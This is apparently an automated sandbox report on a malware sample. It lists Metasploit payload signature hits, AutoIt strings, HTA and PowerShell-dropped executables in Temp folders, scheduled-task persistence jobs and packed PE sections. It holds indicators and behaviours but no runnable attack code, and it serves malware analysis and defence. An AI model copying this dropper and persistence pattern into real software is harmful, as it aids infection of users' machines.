                                                Source: 0000003E.00000002.2594796685.000000000DBAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                                Source: 0000003E.00000002.2594796685.000000000DAC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                                Binary is likely a compiled AutoIt script file
                                                Source: aV2ffcSuKl.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                                Source: aV2ffcSuKl.exe, 00000000.00000000.1292608994.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4452ee9f-a
                                                Source: aV2ffcSuKl.exe, 00000000.00000000.1292608994.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e70eb728-d
                                                Source: 132fd7f0ed.exe, 0000001E.00000000.2085502700.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_defb02a8-e
                                                Source: 132fd7f0ed.exe, 0000001E.00000000.2085502700.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_22d1a84d-6
                                                Source: 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0e236601-a
                                                Source: 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_08ab988b-0
                                                Creates HTA files
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeFile created: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.htaJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeFile created: C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
                                                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Temp\plDCQRtK9.hta
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeFile created: C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
                                                PE file contains section with special chars
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name:
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: .idata
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name:
                                                Source: rapes.exe.11.drStatic PE information: section name:
                                                Source: rapes.exe.11.drStatic PE information: section name: .idata
                                                Source: rapes.exe.11.drStatic PE information: section name:
                                                Source: random[1].exe.16.drStatic PE information: section name:
                                                Source: random[1].exe.16.drStatic PE information: section name: .idata
                                                Source: random[1].exe.16.drStatic PE information: section name:
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name:
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: .idata
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: .rsrc
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: .idata
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: .rsrc
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: .idata
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: .rsrc
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: .idata
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: .rsrc
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: .idata
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name:
                                                Source: random[2].exe.16.drStatic PE information: section name:
                                                Source: random[2].exe.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe.16.drStatic PE information: section name:
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name:
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: .idata
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name:
                                                Source: random[2].exe0.16.drStatic PE information: section name:
                                                Source: random[2].exe0.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe0.16.drStatic PE information: section name:
                                                Source: f0b421a199.exe.16.drStatic PE information: section name:
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: .idata
                                                Source: f0b421a199.exe.16.drStatic PE information: section name:
                                                Source: random[1].exe1.16.drStatic PE information: section name:
                                                Source: random[1].exe1.16.drStatic PE information: section name: .idata
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name:
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: .idata
                                                Source: random[3].exe.16.drStatic PE information: section name:
                                                Source: random[3].exe.16.drStatic PE information: section name: .idata
                                                Source: random[3].exe.16.drStatic PE information: section name:
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name:
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: .idata
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name:
                                                Source: random[2].exe1.16.drStatic PE information: section name:
                                                Source: random[2].exe1.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe1.16.drStatic PE information: section name:
                                                Source: df2fea7261.exe.16.drStatic PE information: section name:
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: .idata
                                                Source: df2fea7261.exe.16.drStatic PE information: section name:
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name:
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: .idata
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name:
                                                Source: vertualiziren.exe.22.drStatic PE information: section name:
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: .idata
                                                Source: vertualiziren.exe.22.drStatic PE information: section name:
                                                Source: benskvi.exe.24.drStatic PE information: section name:
                                                Source: benskvi.exe.24.drStatic PE information: section name: .idata
                                                Source: benskvi.exe.24.drStatic PE information: section name:
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name:
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: .idata
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name:
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name:
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: .idata
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name:
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name:
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: .idata
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name:
                                                Powershell drops PE file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXEJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEJump to dropped file
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C7D5EB
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C71201
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C7E8F6
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile created: C:\Windows\Tasks\Gxtuum.job
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeFile created: C:\Windows\Tasks\Test Task17.job
                                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C820460_2_00C82046
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C180600_2_00C18060
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C782980_2_00C78298
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C4E4FF0_2_00C4E4FF
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C4676B0_2_00C4676B
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00CA48730_2_00CA4873
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C1CAF00_2_00C1CAF0
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C3CAA00_2_00C3CAA0
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C2CC390_2_00C2CC39
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C46DD90_2_00C46DD9
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C191C00_2_00C191C0
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C2B1190_2_00C2B119
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C313940_2_00C31394
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C317060_2_00C31706
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C3781B0_2_00C3781B
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C319B00_2_00C319B0
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C2997D0_2_00C2997D
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C179200_2_00C17920
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C37A4A0_2_00C37A4A
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C37CA70_2_00C37CA7
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C31C770_2_00C31C77
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C49EEE0_2_00C49EEE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C9BE440_2_00C9BE44
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C31F320_2_00C31F32
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BB61F020_2_00BB61F0
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BF40E720_2_00BF40E7
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BEC77D20_2_00BEC77D
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BE2CC020_2_00BE2CC0
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BB4EF020_2_00BB4EF0
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BECF0920_2_00BECF09
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BB51A020_2_00BB51A0
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BB545020_2_00BB5450
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDB56020_2_00BDB560
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDF77B20_2_00BDF77B
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BF197720_2_00BF1977
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BF5D7420_2_00BF5D74
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BF5E9420_2_00BF5E94
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CBB4C021_2_00CBB4C0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CF40E721_2_00CF40E7
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CB61F021_2_00CB61F0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CB51A021_2_00CB51A0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CB545021_2_00CB5450
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDB56021_2_00CDB560
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CEC77D21_2_00CEC77D
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDF77B21_2_00CDF77B
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CF197721_2_00CF1977
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CE2CC021_2_00CE2CC0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CF5D7421_2_00CF5D74
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CB4EF021_2_00CB4EF0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CF5E9421_2_00CF5E94
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CECF0921_2_00CECF09
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 00CD3FF0 appears 136 times
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: String function: 00CDA610 appears 50 times
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: String function: 00BD3FF0 appears 136 times
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: String function: 00BDA610 appears 56 times
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: String function: 00C19CB3 appears 31 times
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: String function: 00C30A30 appears 46 times
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: String function: 00C2F9F2 appears 40 times
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1299702573.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297019666.0000000001939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297019666.0000000001939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1299881436.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297613344.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297613344.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1299249795.0000000001802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297443358.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297443358.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1296937899.0000000001924000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1296937899.0000000001924000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000002.1300503172.0000000001807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000002.1301126049.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000002.1301126049.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297759572.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
                                                Source: aV2ffcSuKl.exe, 00000000.00000003.1297759572.0000000001940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
                                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                                Source: aV2ffcSuKl.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                Source: 0000003E.00000002.2594796685.000000000DB1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                                                Source: 0000003E.00000002.2594796685.000000000DBAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                                                Source: 0000003E.00000002.2594796685.000000000DAC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: Section: ZLIB complexity 0.9988700929752066
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
                                                Source: rapes.exe.11.drStatic PE information: Section: ZLIB complexity 0.9988700929752066
                                                Source: rapes.exe.11.drStatic PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
                                                Source: random[1].exe.16.drStatic PE information: Section: yououbtf ZLIB complexity 0.9947824306962941
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: Section: yououbtf ZLIB complexity 0.9947824306962941
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
                                                Source: ILqcVeT.exe.16.drStatic PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
                                                Source: rXOl0pp.exe.16.drStatic PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
                                                Source: random[1].exe0.16.drStatic PE information: Section: .CSS ZLIB complexity 1.0003273242728532
                                                Source: acd63ce6fe.exe.16.drStatic PE information: Section: .CSS ZLIB complexity 1.0003273242728532
                                                Source: random[2].exe0.16.drStatic PE information: Section: ZLIB complexity 0.999706737987988
